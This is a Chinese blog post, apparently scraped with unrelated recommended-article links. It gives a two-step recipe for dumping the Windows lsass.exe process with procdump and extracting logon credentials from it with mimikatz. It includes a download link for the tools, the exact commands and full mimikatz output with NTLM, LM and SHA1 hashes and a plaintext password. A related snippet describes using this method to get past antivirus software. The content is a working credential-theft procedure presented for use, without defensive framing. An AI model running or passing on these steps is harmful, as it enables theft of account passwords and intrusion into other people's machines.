使用procdump64+mimikatz可实现从内存中获取明文密码

工具

链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38

首先得先获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到, 比如这样

1.导出lsass.exe

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

(注:必须使用管理员权限)

ProcDump v8.0 - Writes process dump files

Copyright (C) 2009-2016 Mark Russinovich

Sysinternals - www.sysinternals.com

With contributions from Andrew Richards

[15:33:26] Dump 1 initiated: C:\Users\chenglee\Desktop\Procdump\lsass.dmp

[15:33:28] Dump 1 writing: Estimated dump file size is 34 MB.

[15:33:28] Dump 1 complete: 34 MB written in 1.4 seconds

[15:33:28] Dump count reached.

2.执行mimikatz

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

(注:必须使用管理员权限)

ECHO 处于打开状态。

  .#####.   mimikatz 2.1.1 (x64) built on Jun 16 2018 18:49:05 - lil!

 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)

 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz

 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )

  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # sekurlsa::minidump lsass.dmp

Switch to MINIDUMP : 'lsass.dmp'

mimikatz(commandline) # sekurlsa::logonPasswords full

Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 137859 (00000000:00021a83)

Session           : Interactive from 1

User Name         : chenglee

Domain            : chenglee-PC

Logon Server      : CHENGLEE-PC

Logon Time        : 2018/7/25 15:06:35

SID               : S-1-5-21-452281122-3045282507-3243563612-1000

	msv :

	 [00000003] Primary

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * LM       : 9cffd5e7eefa14babacbf0b4adf55fde

	 * NTLM     : 8d0f8e1a18236379538411a9056799f5

	 * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20

	tspkg :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	wdigest :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	kerberos :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	ssp :

	credman :	

Authentication Id : 0 ; 137821 (00000000:00021a5d)

Session           : Interactive from 1

User Name         : chenglee

Domain            : chenglee-PC

Logon Server      : CHENGLEE-PC

Logon Time        : 2018/7/25 15:06:35

SID               : S-1-5-21-452281122-3045282507-3243563612-1000

	msv :

	 [00000003] Primary

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * LM       : 9cffd5e7eefa14babacbf0b4adf55fde

	 * NTLM     : 8d0f8e1a18236379538411a9056799f5

	 * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20

	tspkg :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	wdigest :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	kerberos :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	ssp :

	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)

Session           : Service from 0

User Name         : LOCAL SERVICE

Domain            : NT AUTHORITY

Logon Server      : (null)

Logon Time        : 2018/7/25 15:06:15

SID               : S-1-5-19

	msv :

	tspkg :

	wdigest :

	 * Username : (null)

	 * Domain   : (null)

	 * Password : (null)

	kerberos :

	 * Username : (null)

	 * Domain   : (null)

	 * Password : (null)

	ssp :

	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)

Session           : Service from 0

User Name         : CHENGLEE-PC$

Domain            : WORKGROUP

Logon Server      : (null)

Logon Time        : 2018/7/25 15:06:15

SID               : S-1-5-20

	msv :

	tspkg :

	wdigest :

	 * Username : CHENGLEE-PC$

	 * Domain   : WORKGROUP

	 * Password : (null)

	kerberos :

	 * Username : chenglee-pc$

	 * Domain   : WORKGROUP

	 * Password : (null)

	ssp :

	credman :	

Authentication Id : 0 ; 48630 (00000000:0000bdf6)

Session           : UndefinedLogonType from 0

User Name         : (null)

Domain            : (null)

Logon Server      : (null)

Logon Time        : 2018/7/25 15:06:06

SID               :

	msv :

	tspkg :

	wdigest :

	kerberos :

	ssp :

	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)

Session           : UndefinedLogonType from 0

User Name         : CHENGLEE-PC$

Domain            : WORKGROUP

Logon Server      : (null)

Logon Time        : 2018/7/25 15:06:05

SID               : S-1-5-18

	msv :

	tspkg :

	wdigest :

	 * Username : CHENGLEE-PC$

	 * Domain   : WORKGROUP

	 * Password : (null)

	kerberos :

	 * Username : chenglee-pc$

	 * Domain   : WORKGROUP

	 * Password : (null)

	ssp :

	credman :	

mimikatz(commandline) # exit

Bye!

看, 密码[lizhenghua]处于明文暴露状态.

如果不是使用管理员模式运行cmd会报错,

两步完成利用procdump64+mimikatz获取win用户密码的更多相关文章

  1. procdump64+mimikatz获取win用户hash密码

    1.导出lsass.exe procdump64.exe -accepteula -ma lsass.exe lsass.dmp 2.执行mimikatz mimikatz.exe "sek ...

  2. 微信公众平台开发—利用OAuth2.0获取微信用户基本信息

    在借鉴前两篇获取微信用户基本信息的基础下,本人也总结整理了一些个人笔记:如何通过OAuth2.0获取微信用户信息 1.首先在某微信平台下配置OAuth2.0授权回调页面: 2.通过appid构造url ...

  3. SpringBoot中获取微信用户信息从未如此简单!

    前言 不知道你是否参加过拼多多上邀请微信好友砍价功能,这个功能实现首先需要考虑的就是获取微信用户的信息.获取用户信息就是获取公众号下微信用户的信息,今天我就来讲讲如何从公众号下获取微信用户信息. 需要 ...

  4. 利用procdump+Mimikatz 绕过杀软获取Windows明文密码(转)

    Mimikatz现在已经内置在Metasploit’s meterpreter里面,我们可以通过meterpreter下载.但是你如果觉得还要考虑杀毒软件,绑定payload之类的东西太过复杂,我们可 ...

  5. Android 两步搞定Fragment的返回键

    Fragment可以说是在Android开发必需要使用到技术,项目中的界面基本上都是使用Fragment来实现,而Activity只是作为Fragment的载体,但有些特殊情况下Fragment也不得 ...

  6. Kubernetes 两步验证 - 使用 Serverless 实现动态准入控制

    作者:CODING - 王炜 1. 背景 如果对 Kubernetes 集群安全特别关注,那么我们可能想要实现这些需求: 如何实现 Kubernetes 集群的两步验证,除了集群凭据,还需要提供一次性 ...

  7. 七牛云如何绑定二次验证码_虚拟MFA_两步验证_谷歌身份验证器?

    一般情况下,点账户名——账户设置——安全设置,即可开通两步验证 具体步骤见链接  七牛云如何绑定二次验证码_虚拟MFA_两步验证_谷歌身份验证器?   二次验证码小程序(官网)对比谷歌身份验证器APP ...

  8. 挑子学习笔记:两步聚类算法(TwoStep Cluster Algorithm)——改进的BIRCH算法

    转载请标明出处:http://www.cnblogs.com/tiaozistudy/p/twostep_cluster_algorithm.html 两步聚类算法是在SPSS Modeler中使用的 ...

  9. 每次Xcode 升级之后 插件失效,两步解决

    以下内容来源:http://www.cocoachina.com/bbs/read.php?tid=296269 每次Xcode 升级之后 插件失效,两步解决 1.打开终端,输入以下代码获取到DVTP ...

随机推荐

  1. 监督学习之knn算法

    1.1  KNN(K-Nearest Neighbor)工作原理: 存在一个样本数据集合,也称为训练样本集,并且样本集中每个数据都存在标签,即我们知道样本集中每一数据与所属分类对应的关系.输入没有标签 ...

  2. 如何解决“504 Gateway Time-out”错误

    做网站的同学经常会发现一些nginx服务器访问时候提示504 Gateway Time-out错误,一般情况下是由nginx默认的fastcgi进程响应慢引起的,但也有其他情况,这里我总结了一些解决办 ...

  3. c#中的模态对话框和非模态对话框

    模态对话框弹出窗口阻止调用窗口的所有消息响应.只有在弹出窗口结束后调用窗口才能继续.在模态窗口“关闭”后,可以读取模态窗口中信息,包括窗口的返回状态,窗口子控件的值. 非模态对话框可以在弹出窗口和调用 ...

  4. Exception sending context initialized event to listener instance of class org.springframework.web.context.ContextLoaderListener

    严重: Exception sending context initialized event to listener instance of class org.springframework.we ...

  5. Java包装

    public class Test2 { public static void main(String[] args) { /*String str = "..............&qu ...

  6. Oracle / PLSQL函数 - LENGTH和LENGTHB

    1.LENGTH( string1 ) 2.LENGTHB( string1 ) 在oracle中,这两个函数都有差不多意思,最大的区别在于:length 求得是字符长度,lengthb求得是字节长度 ...

  7. GE与POST方法区别

    1.用途. GET方法一般用于查询并获取信息,这意味着它是幂等的(对同一个url的多个请求,返回结果完全一样),因为没有修改资源状态,所以它是安全的.而POST一般用于更新资源信息,既不是幂等,也不是 ...

  8. Object-C-自定义类型归档

    对自定义类型的对象进行本地化保存,那么该类型必须实现NSCoding协议! NSCoding 协议中只有两个方法,都是require的方法,一个是把本身的类型进行编码,一个是解码成类对象,返回一个对象 ...

  9. La Vie en rose (模拟)

    #include<bits/stdc++.h> using namespace std; ; ; int T, n, m; char str1[maxm], str2[maxn]; int ...

  10. tomcat的JVM调优

    1.error场景 Tomcat 长期运行过程遇到Caused by: java.lang.OutOfMemoryError: PermGen space或java.lang.OutOfMemoryE ...